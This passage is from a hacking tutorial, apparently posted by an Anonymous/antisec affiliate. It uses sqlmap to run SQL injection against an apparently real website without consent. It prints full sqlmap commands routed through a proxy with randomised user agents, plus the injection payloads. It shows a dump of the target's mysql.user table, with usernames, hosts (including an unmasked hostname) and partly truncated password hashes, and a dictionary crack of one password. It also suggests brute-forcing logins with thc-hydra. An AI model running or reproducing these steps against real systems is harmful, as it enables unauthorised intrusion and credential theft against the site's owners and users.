  663. [18:48:29] [INFO] retrieved: help_relation
  664. [18:48:30] [INFO] retrieved: mysql
  665. [18:48:31] [INFO] retrieved: help_keyword
  666. [18:48:31] [INFO] retrieved: mysql
  667. [18:48:32] [INFO] retrieved: help_category
  668. [18:48:33] [INFO] retrieved: mysql
  669. [18:48:33] [INFO] retrieved: func
  670. [18:48:34] [INFO] retrieved: mysql
  671. [18:48:35] [INFO] retrieved: db
  672. [18:48:35] [INFO] retrieved: mysql
  673. [18:48:36] [INFO] retrieved: columns_priv
  674. Database: mysql
  675. [18 tables]
  676. +---------------------------+
  677. | columns_priv              |
  678. | db                        |
  679. | func                      |
  680. | help_category             |
  681. | help_keyword              |
  682. | help_relation             |
  683. | help_topic                |
  684. | host                      |
  685. | proc                      |
  686. | procs_priv                |
  687. | tables_priv               |
  688. | time_zone                 |
  689. | time_zone_leap_second     |
  690. | time_zone_name            |
  691. | time_zone_transition      |
  692. | time_zone_transition_type |
  693. | user                      |
  694. | user_info                 |
  695. +---------------------------+
  696.  
  697. [18:48:36] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'
  698.  
  699. [*] shutting down at: 18:48:36
  700.  
  701.  
  702. FINALLY!!!!
  703.  
  704. We have found a usefull table now! While i would love to see and 'admin' table, the 'user' table does get me happy!  Now that we have found a good table we need to find the
  705. columns in the table and maybe we can find some passwords as well!
  706.  
  707. We are going to add the following options to our command line:
  708.  
  709. -D mysql     -> use database mysql
  710.  
  711. -T user      -> use table user_info
  712.  
  713. --dump       -> dump all the columns you find in table user
  714.  
  715.  
  716. Okay here is what our command line will look like now...
  717.  
  718.  
  719. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" -D mysql -T user --dump
  720.  
  721.     sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
  722.     http://sqlmap.sourceforge.net
  723.  
  724. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
  725.  
  726. [*] starting at: 18:49:04
  727.  
  728. [18:49:04] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; fr-be; rv:1.9.0.8) Gecko/2009073022 Ubuntu/9.04 (jaunty) Firefox/3.0.13
  729. [18:49:05] [INFO] using '/pentest/database/sqlmap/output/www.indexcHIDEN.com/session' as session file
  730. [18:49:05] [INFO] resuming injection data from session file
  731. [18:49:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  732. [18:49:05] [INFO] testing connection to the target url
  733. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  734. ---
  735. Place: GET
  736. Parameter: id
  737.     Type: boolean-based blind
  738.     Title: AND boolean-based blind - WHERE or HAVING clause
  739.     Payload: id=6 AND 8517=8517
  740.  
  741.     Type: error-based
  742.     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  743.     Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  744.  
  745.     Type: AND/OR time-based blind
  746.     Title: MySQL > 5.0.11 AND time-based blind
  747.     Payload: id=6 AND SLEEP(5)
  748. ---
  749.  
  750. [18:49:17] [INFO] manual usage of GET payloads requires url encoding
  751. [18:49:17] [INFO] the back-end DBMS is MySQL
  752.  
  753. web application technology: Apache
  754. back-end DBMS: MySQL 5.0
  755. [18:49:17] [INFO] fetching columns for table 'user' on database 'mysql'
  756. [18:49:18] [INFO] the SQL query used returns 37 entries
  757. [18:49:18] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
  758. [18:49:20] [INFO] retrieved: max_user_connections
  759. [18:49:22] [INFO] retrieved: int(11) unsigned
  760. [18:49:23] [INFO] retrieved: max_connections
  761. [18:49:24] [INFO] retrieved: int(11) unsigned
  762. [18:49:25] [INFO] retrieved: max_updates
  763. [18:49:27] [INFO] retrieved: int(11) unsigned
  764. [18:49:28] [INFO] retrieved: max_questions
  765. [18:49:30] [INFO] retrieved: int(11) unsigned
  766. [18:49:31] [INFO] retrieved: x509_subject
  767. [18:49:34] [INFO] retrieved: blob
  768.  
  769. I HAVE REMOVED SOME OF INFORMATION TO KEEP THE TUTORIAL SIZE DOWN!
  770.  
  771. [18:51:32] [INFO] retrieved: localhost
  772. [18:51:33] [INFO] retrieved: root
  773. [18:51:35] [INFO] retrieved: N
  774. [18:51:37] [INFO] retrieved:
  775. [18:51:38] [INFO] retrieved: *2F1FBE78A7A4C9CA6F239A4C12D2F6B16B
  776. [18:51:39] [INFO] retrieved: N
  777. [18:51:41] [INFO] retrieved: N
  778. [18:51:42] [INFO] retrieved: N
  779. [18:51:46] [INFO] retrieved:
  780. [18:51:47] [INFO] retrieved:
  781. [18:51:49] [INFO] retrieved: N
  782. [18:54:08] [INFO] retrieved: Y
  783. [18:54:09] [INFO] retrieved: localhost
  784. [18:54:11] [INFO] retrieved:
  785. [18:54:12] [INFO] retrieved: Y
  786. [18:54:14] [INFO] retrieved:
  787. [18:54:15] [INFO] retrieved: *605A60BF6EFC17C157CF1E34F576F35BFD80
  788. [18:54:16] [INFO] retrieved: Y
  789. [18:57:28] [INFO] retrieved: projects
  790. [18:57:29] [INFO] retrieved: Y
  791. [18:57:31] [INFO] retrieved:
  792. [18:57:33] [INFO] retrieved: *B012E8731FF1DF44F3D8B26837708985278C
  793. [18:57:34] [INFO] retrieved: Y
  794.  
  795. recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
  796. [19:09:16] [INFO] using hash method: 'mysql_passwd'
  797. what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
  798. [19:10:00] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
  799. do you want to use common password suffixes? (slow!) [y/N] N
  800. [19:10:13] [INFO] starting dictionary attack (mysql_passwd)
  801. [19:10:13] [INFO] found: 'password' for hash: '*e56a114692fe0de073f9a1dd68a00eeb9703'                                                                          
  802. [19:10:13] [INFO] found: 'password' for user: 'projects'                                                                                                          
  803. Database: mysql                                                                                                                                                  
  804. Table: user
  805. [25 entries]
  806.  
  807. +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+
  808. | Alter_priv | Alter_routine_priv | Create_priv | Create_routine_priv | Create_tmp_table_priv | Create_user_priv | Create_view_priv | Delete_priv | Drop_priv | Execute_priv | File_priv | Grant_priv | Host                            | Index_priv | Insert_priv | Lock_tables_priv | max_connections | max_questions | max_updates | max_user_connections | Password                                            | Process_priv | References_priv | Reload_priv | Repl_client_priv | Repl_slave_priv | Select_priv | Show_db_priv | Show_view_priv | Shutdown_priv | ssl_cipher | ssl_type | Super_priv | Update_priv | User           | x509_issuer | x509_subject |
  809. +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+
  810. | N          | N                  | N           | N                   | N                     | N                | N                | N           | N         | N            | N         | N          | localhost                       | N          | N           | N                | 0               | 0             | 0           | 0                    | *2F1FBE78A7A4C9CA6F239A4C12D2F6B16B8D5              | N            | N               | N           | N                | N               | N           | N            | N              | N             | NULL       | NULL     | N          | N           | root           | NULL        | NULL         |
  811. | N          | N                  | N           | N                   | N                     | N                | N                | N           | N         | N            | N         | N          | localhost                       | N          | N           | N                | 0               | 0             | 0           | 0                    | *CF9EBDBEB7E917593C84F8FA6CA1D13E289F5F             | N            | N               | N           | N                | N               | N           | N            | N              | N             | NULL       | NULL     | N          | N           | panel          | NULL        | NULL         |
  812. | Y          | Y                  | Y           | Y                   | Y                     | N                | Y                | Y           | Y         | Y            | Y         | N          | localhost                       | Y          | Y           | N                | 0               | 0             | 0           | 0                    | *E784A49C8C7340D14CBFEC6181911832FB                 | N            | N               | N           | N                | N               | Y           | Y            | Y              | N             | NULL       | NULL     | N          | Y           | graber         | NULL        | NULL         |
  813. | Y          | Y                  | Y           | Y                   | Y                     | Y                | Y                | Y           | Y         | Y            | Y         | Y          | localhost                       | Y          | Y           | Y                | 0               | 0             | 0           | 0                    | *605A60BF6EFC17C157CF1E34F576F35B                   | Y            | Y               | Y           | Y                | Y               | Y           | Y            | Y              | Y             | NULL       | NULL     | Y          | Y           | NULL           | NULL        | NULL         |
  814. | Y          | Y                  | Y           | Y                   | Y                     | Y                | Y                | Y           | Y         | Y            | Y         | Y          | ic-earth-ny.indexcopernicus.com | Y          | Y           | Y                | 0               | 0             | 0           | 0                    | *6A511966616CD43C35166A81BC2AC01F7                  | Y            | Y               | Y           | Y                | Y               | Y           | Y            | Y              | Y             | NULL       | NULL     | Y          | Y           | root           | NULL        | NULL         |
  815. | Y          | Y                  | Y           | Y                   | Y                     | N                | Y                | Y           | Y         | Y            | Y         | N          | ic-earth-ny.indexcopernicus.com | Y          | Y           | N                | 0               | 0             | 0           | 0                    | *E56A114692FE0DE073F9A1DD68A00EEB9703F3             | N            | N               | N           | N                | N               | Y           | Y            | Y              | N             | NULL       | NULL     | N          | Y           | NULL           | NULL        | NULL         |
  816. | Y          | Y                  | Y           | Y                   | Y                     | N                | Y                | Y           | Y         | Y            | Y         | N          | 10.11.12.1                      | Y          | Y           | N                | 0               | 0             | 0           | 0                    | *5917878B1F04F5E4B9815B2056B340F87CD477             | N            | N               | N           | N                | N               | Y           | Y            | Y              | N             | NULL       | NULL     | N          | Y           | root           | NULL        | NULL         |
  817. | Y          | Y                  | Y           | Y                   | Y                     | N                | Y                | Y           | Y         | Y            | Y         | N          | 10.11.12.1                      | Y          | Y           | N                | 0               | 0             | 0           | 0                    | *B012E8731FF1DF44F3D8B26837708985278C3C             | N            | N               | N           | N                | N               | Y           | Y            | Y              | N             | NULL       | NULL     | N          | Y           | projects       | NULL        | NULL         |
  818. | Y          | Y                  | Y           | Y                   | Y                     | Y                | Y                | Y           | Y         | Y            | Y         | Y          | 10.11.12.1                      | Y          | Y           | Y                | 0               | 0             | 0           | 0                    | *7742916D8C9524F7826938F0A5F1FB499                  | Y            | Y               | Y           | Y                | Y               | Y           | Y            | Y              | Y             | NULL       | NULL     | Y          | Y           | panel          | NULL        | NULL         |
  819. | N          | N                  | N           | N                   | N                     | N                | N                | N           | N         | N            | N         | N          | 10.11.12.1                      | N          | N           | N                | 0               | 0             | 0           | 0                    | *16F2DA51526C51873E29386679D394E20ADA48             | N            | N               | N           | N                | N               | N           | N            | N              | N             | NULL       | NULL     | N          | N           | lowersuser     | NULL        | NULL         |
  820. | Y          | Y                  | Y           | Y                   | Y                     | N                | Y                | Y           | Y         | Y            | Y         | N          | 10.11.12.1                      | Y          | Y           | N                | 0               | 0             | 0           | 0                    | *854BA136D598D180847EC4689EB51C618239A              | N            | N               | N           | N                | N               | Y           | Y            | Y              | N             | NULL       | NULL     | N          | Y           | graber         | NULL        | NULL         |
  821.  
  822. +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+
  823.  
  824. [19:10:20] [INFO] Table 'mysql.user' dumped to CSV file '/pentest/database/sqlmap/output/www.indexHIDEN.com/dump/mysql/user.csv'
  825. [19:10:20] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'
  826.  
  827. [*] shutting down at: 19:10:20
  828.  
  829.  
  830. YES!!!!
  831.  
  832. Okay as you can see sqlmap was able to determine the user login names and find the encrypted has passwords. It will ask us if we want to try and do a brute force password
  833. crack attempt and ofcourse we will choose yes!!!
  834.  
  835. NOTE: i have removed a lot of the users and have deleted a good chunk of the encryped password and i will not be posting passwords on this tutorial, sorry!
  836.  
  837.  
  838. Can you now see why this is such a great tool!
  839.  
  840. For those of you who have been doing your sqlinjection attacks manually, i hope you can now see the value in such a great tool!
  841.  
  842. We now have login names and passwords that we can use against our target! And if you get unlucky and you are not able to get the full encrypted password you are still lucky
  843. in knowing what login names are used for the target network, and you could use an app like thc-hydra to try and get the passwords for the login names. Just a suggestions...
  844.  
  845.  
  846. Okay very quickly i will go over one last option with sqlmap for now because i am getting tired...
  847.  
  848. the option:
  849.  
  850. --wizard
  851.  
  852. the option --wizard will give you a gui interface to use sqlmap..
  853.  
  854.  
  855. Here is a quick example..
  856.  
  857. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --wizard
  858.  
  859.     sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
  860.     http://sqlmap.sourceforge.net
  861.  
  862. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
  863.  
  864. [*] starting at: 19:51:46
  865.  
  866. POST data (--data) [Enter for None]: --data
  867. Injection difficulty (--level/--risk). Please choose:
  868. [1] Normal (default)
  869. [2] Medium
  870. [3] Hard
  871. > 1
  872. Enumeration (--banner/--current-user/etc). Please choose:
  873. [1] Basic (default)
  874. [2] Smart
  875. [3] All
  876. > 3
  877.  
  878. sqlmap is running, please wait..
  879.  
  880. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  881. ---
  882. Place: GET
  883. Parameter: id
  884.     Type: boolean-based blind
  885.     Title: AND boolean-based blind - WHERE or HAVING clause
  886.     Payload: id=6 AND 8517=8517
  887.  
  888.  
  889. Okay well i hope you have found this tutorial helpful..and i will be adding more later i promise. I will get into more details. Also i plan to have a tutorial out on sqlninja!
  890. Be on the look out for that.
  891.  
  892. Well i hope it helps!
  893.  
  894. Take care my brothers...
  895.  
  896. BIG SHOUTS TO ANONYMOUS...
  897.  
  898. irc.anonymous.li
  899. #antisec  
  900.  
  901.  
  902. Tutorial by gh0st